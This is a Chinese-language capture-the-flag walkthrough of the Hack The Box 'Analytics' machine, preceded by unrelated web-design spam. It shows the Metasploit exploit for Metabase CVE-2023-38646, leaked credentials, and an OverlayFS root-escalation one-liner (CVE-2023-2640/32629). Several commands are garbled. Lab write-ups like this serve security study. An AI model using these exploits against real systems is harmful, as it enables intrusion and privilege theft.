创新的宁波网站建设,网站移动端自适应,discuz wordpress 选择,合肥做网站公司有哪些文章目录 1 端口扫描2 测试思路3 漏洞探测4 权限获取5 权限提升 Analytics 测试过程 1 端口扫描 nmap -sC -sV 10.129.205.1422 测试思路 目标服务器只开启了80端口#xff0c;所以出发点从80端口开始。对于web页面#xff0c;能做的大致思路有#xff1a; 1.目录扫描 2… 文章目录 1 端口扫描2 测试思路3 漏洞探测4 权限获取5 权限提升 Analytics 测试过程 1 端口扫描 nmap -sC -sV 10.129.205.1422 测试思路 目标服务器只开启了80端口所以出发点从80端口开始。对于web页面能做的大致思路有 1.目录扫描 2.网站信息泄漏 3.探测web站点漏洞 4.网站指纹 3 漏洞探测 1.访问web站点
echo 10.129.205.142 analytical.htb | sudo tee -a /etc/hosts访问web站点http://analytical.htb/发现存在login登录页面。 echo 10.129.205.142 data.analytical.htb | sudo tee -a /etc/hosts点击 Login 访问登录页面 http://data.analytical.htb发现使用Metabase开源商业智能工具探测是否有Metabase相关漏洞。 2.搜索Metabase相关漏洞
search metabase发现Metabase存在CVE-2023-38646可以进行CVE-2023-38646漏洞利用 3.CVE-2023-38646漏洞利用
use exploit/linux/http/metabase_setup_token_rce
show options # 使用env命令查看环境变量发现存在用户名密码
META_USERmetalytics
META_PASSAn4lytics_ds20223#接下来尝试使用ssh进行登录如果可以连接就能获取到metalytics的用户权限。 4 权限获取 ssh登录成功获取到metalytics用户权限查看用户flag。
ssh metalytics10.129.205.1425 权限提升 # 显示出自己执行 sudo 的使用者的权限
sudo -l# 显示系统所有相关信息
uname -a通过查看系统相关信息发现内核版本查看该版本是否存在内核提权漏洞。Ubuntu内核的OverlayFS模块中存在CVE-2023-2640 和 CVE-2023-32629漏洞可以通过该漏洞将权限提升至root权限。 漏洞利用代码如下
unshare -rm sh -c mkdir l u w m cp /u*/b*/p*3 l/; setcap cap_setuideip l/python3;mount -t overlay overlay -o rw,lowerdirl,upperdiru,workdirw m touch m/*; u/python3 -c import os;import pty;os.setuid(0);pty.spawn(/bin/bash)ls -la /root
cat /root/root.txt